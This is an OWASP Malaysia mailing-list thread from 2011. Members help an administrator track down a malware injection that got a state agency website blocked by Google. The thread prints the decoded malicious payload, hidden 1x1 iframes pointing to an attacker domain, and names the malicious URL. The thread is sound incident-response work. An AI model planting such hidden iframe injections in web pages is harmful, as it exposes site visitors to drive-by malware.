[Owasp-Malaysia] Malware Detected!

Mohd Syamsuri msyamsuri at gmail.com
Tue Feb 8 21:54:09 EST 2011


I'm still searching for the source..
Last week I asked the practical students to upload images on the site...
After they had finished the job, Uncle G blocked my site.

I have "quarantined" their laptop... :p


** Poor Malaysian IT kids. They are only taught to pass exams...


On Wed, Feb 9, 2011 at 9:45 AM, Sharuzzaman Ahmat Raslan <
sharuzzaman at gmail.com> wrote:

> Please check how the line got injected into your system.
>
> You need to find the source of the problem to make sure it will not happen
> again.
>
>
>
>
> On Wed, Feb 9, 2011 at 6:53 AM, Mohd Syamsuri <msyamsuri at gmail.com> wrote:
>
>> Mr Adnan thanks for the info and guide..
>>
>> I have cleaned all the mess and the site is up and running again..
>>
>> thanks to all too..
>>
>> ** I will blog this so others can make it as a guide...
>>
>>
>> On Tue, Feb 8, 2011 at 6:00 PM, Adnan bin Mohd Shukor <
>> adnan.shukor at gmail.com> wrote:
>>
>>> mamp <= LOL typo.. it should be nano
>>> js <= one of the binaries in Spidermonkey. get the patched version
>>> http://blog.didierstevens.com/programs/spidermonkey/ and if you are
>>> working on MacOS/Darwin, apply this patch
>>>
>>> http://blog.xanda.org/2010/10/15/fix-for-spidermonkey-build-issue-in-darwin/
>>>
>>> thanks
>>>
>>> On 8 February 2011 17:56, Sharuzzaman Ahmat Raslan
>>> <sharuzzaman at gmail.com> wrote:
>>> > I can see 2 interesting apps/scripts:
>>> >
>>> > 1. mamp
>>> > 2. /opt/analysis/js/js
>>> >
>>> > care to share? hopefully it is open source ;)
>>> >
>>> >
>>> > On Tue, Feb 8, 2011 at 5:50 PM, Adnan bin Mohd Shukor
>>> > <adnan.shukor at gmail.com> wrote:
>>> >>
>>> >> Here is my bash history:
>>> >>
>>> >> xanda:tmp adnan$ history
>>> >> <snip>
>>> >>  500  cd /tmp
>>> >>  501  wget http:/www2.pkink.gov.my/indexsedc.php
>>> >>  502  wget http://www2.pkink.gov.my/indexsedc.php
>>> >>  503  nano indexsedc.php
>>> >>  504  wget http://www2.pkink.gov.my/indexsedc.php
>>> >>  505  mamp indexsedc.php.1
>>> >>  506  nano indexsedc.php.1
>>> >>  507  wget http://www2.pkink.gov.my/sedc.php
>>> >>  508  nano sedc.php
>>> >>  509  wget http://www2.pkink.gov.my/default.php
>>> >>  510  nano default.php
>>> >>  511  nano default.php
>>> >>  512  clear
>>> >> <I've removed the tags and left the clean JavaScript inside>
>>> >>  513  mv default.php default.txt
>>> >>  514  /opt/analysis/js/js < default.txt
>>> >>  515  cat write.log
>>> >>  516  history
>>> >> xanda:tmp adnan$
>>> >>
>>> >> Below is the output of the cat:
>>> >> [output]
>>> >> xanda:tmp adnan$ cat write.log
>>> >> <iframe width="1" height="1" src="http://asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA=="></iframe>"<iframe width="1" height="1" src="http://asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA=="></iframe>"
>>> >> [/output]
>>> >>
>>> >>
>>> >> Hint: you might use a modified version of spidermonkey to 'understand'
>>> >> the javascript
>>> >>
>>> >> Thanks
>>> >>
>>> >> On 8 February 2011 17:38, Mohd Syamsuri <msyamsuri at gmail.com> wrote:
>>> >> > thanks for the info..
>>> >> > I will check all the files.
>>> >> >
>>> >> > How did you find it?
>>> >> >
>>> >> > On Tue, Feb 8, 2011 at 5:21 PM, Adnan bin Mohd Shukor
>>> >> > <adnan.shukor at gmail.com> wrote:
>>> >> >>
>>> >> >> Here is the flow:
>>> >> >>
>>> >> >> 1) your indexsedc.php has an iframe to sedc.php
>>> >> >> 2) and your sedc.php has an iframe to default.php
>>> >> >> 3) and in default.php (look at the last 2 lines), javascript will
>>> >> >> actually create an iframe to
>>> >> >> asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==
>>> >> >>
>>> >> >> thanks :)
>>> >> >>
>>> >> >> On 8 February 2011 17:07, Mohd Syamsuri <msyamsuri at gmail.com> wrote:
>>> >> >> > can you point...
>>> >> >> > my index.htm or indexsedc.php or other file?
>>> >> >> >
>>> >> >> > On Tue, Feb 8, 2011 at 4:19 PM, Adnan bin Mohd Shukor
>>> >> >> > <adnan.shukor at gmail.com> wrote:
>>> >> >> >>
>>> >> >> >> you have an iframe pointed to
>>> >> >> >> asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==
>>> >> >> >>
>>> >> >> >> which is not xss :)
>>> >> >> >>
>>> >> >> >> From my personal point of view, it's either caused by:
>>> >> >> >> 1) malware on a pc which has been used for ftp/access to the server
>>> >> >> >> 2) compromised server
>>> >> >> >>
>>> >> >> >> you can send your access.log to cyber999 at cybersecurity.my or
>>> >> >> >> mycert at mycert.org.my for further analysis :)
>>> >> >> >>
>>> >> >> >> thanks
>>> >> >> >>
>>> >> >> >> On 8 February 2011 16:00, Mohd Syamsuri <msyamsuri at gmail.com> wrote:
>>> >> >> >> > I have checked it.
>>> >> >> >> > On Tue, Feb 8, 2011 at 3:49 PM, Rasta Boy <rastaboyz at gmail.com> wrote:
>>> >> >> >> >>
>>> >> >> >> >> Hi Mohd Syamsuri,
>>> >> >> >> >>
>>> >> >> >> >> Why don't you check the reason why it's being blocked; it might
>>> >> >> >> >> help.
>>> >> >> >> >>
>>> >> >> >> >> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=http://www.pkink.gov.my/
>>> >> >> >> >> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=AS:4788
>>> >> >> >> >>
>>> >> >> >> >> Regards,
>>> >> >> >> >> Kishur
>>> >> >> >> >>
>>> >> >> >> >>
>>> >> >> >> >>
>>> >> >> >> >> On Tue, Feb 8, 2011 at 3:19 PM, Mohd Syamsuri <msyamsuri at gmail.com> wrote:
>>> >> >> >> >>>
>>> >> >> >> >>> Assalamualaikum and good day to my fellow friends.
>>> >> >> >> >>> I need some advice.
>>> >> >> >> >>> The web site of Perbadanan Kemajuan Iktisad Negeri Kelantan
>>> >> >> >> >>> (http://www.pkink.gov.my) has been blocked by Google for almost
>>> >> >> >> >>> 4 days.
>>> >> >> >> >>> It said that we host malware on our server: Malware Detected!
>>> >> >> >> >>> (Google said that!!)
>>> >> >> >> >>> What I did is..
>>> >> >> >> >>> 1. Scanned all the data and uploaded new data
>>> >> >> >> >>> 2. Checked the index.html or index.php
>>> >> >> >> >>> 3. Scanned using the web scanners at
>>> >> >> >> >>> http://www.avgthreatlabs.com/
>>> >> >> >> >>> http://www.virustotal.com
>>> >> >> >> >>> but still get blocked..
>>> >> >> >> >>> Google said: Suspected injected code
>>> >> >> >> >>> <FRAME SRC="http://www2.pkink.gov.my/indexsedc.php"
>>> >> >> >> >>> NAME="confcontent"
>>> >> >> >> >>> scrolling=yes >
>>> >> >> >> >>> I have been using this code for almost 2 years
>>> >> >> >> >>> What should I do now?
>>> >> >> >> >>>
>>> >> >> >> >>> --
>>> >> >> >> >>> best regard
>>> >> >> >> >>> syamsuri
>>> >> >> >> >>>
>>> >> >> >> >>>
>>> >> >> >> >>>
>>> >> >> >> >>> _______________________________________________
>>> >> >> >> >>> Owasp-Malaysia mailing list
>>> >> >> >> >>> Owasp-Malaysia at lists.owasp.org
>>> >> >> >> >>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>> >> >> >> >>>
>>> >> >> >> >>> OWASP Malaysia Wiki
>>> >> >> >> >>> http://www.owasp.org/index.php/Malaysia
>>> >> >> >> >>>
>>> >> >> >> >>> OWASP Malaysia Wiki Facebook
>>> >> >> >> >>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>> >> >> >> >>
>>> >> >> >> >>
>>> >> >> >> >
>>> >> >> >> >
>>> >> >> >> >
>>> >> >> >> > --
>>> >> >> >> > best regard
>>> >> >> >> > syamsuri
>>> >> >> >> >
>>> >> >> >> >
>>> >> >> >> >
>>> >> >> >> >
>>> >> >> >
>>> >> >> >
>>> >> >> >
>>> >> >> > --
>>> >> >> > best regard
>>> >> >> > syamsuri
>>> >> >> >
>>> >> >> >
>>> >> >> >
>>> >> >> >
>>> >> >
>>> >> >
>>> >> >
>>> >> > --
>>> >> > best regard
>>> >> > syamsuri
>>> >> >
>>> >> >
>>> >> >
>>> >> >
>>> >
>>> >
>>> >
>>> > --
>>> > Sharuzzaman Ahmat Raslan
>>> >
>>> >
>>>
>>
>>
>>
>> --
>> best regard
>> syamsuri
>>
>>
>>
>>
>
>
>
> --
> Sharuzzaman Ahmat Raslan
>
>



-- 
best regard
syamsuri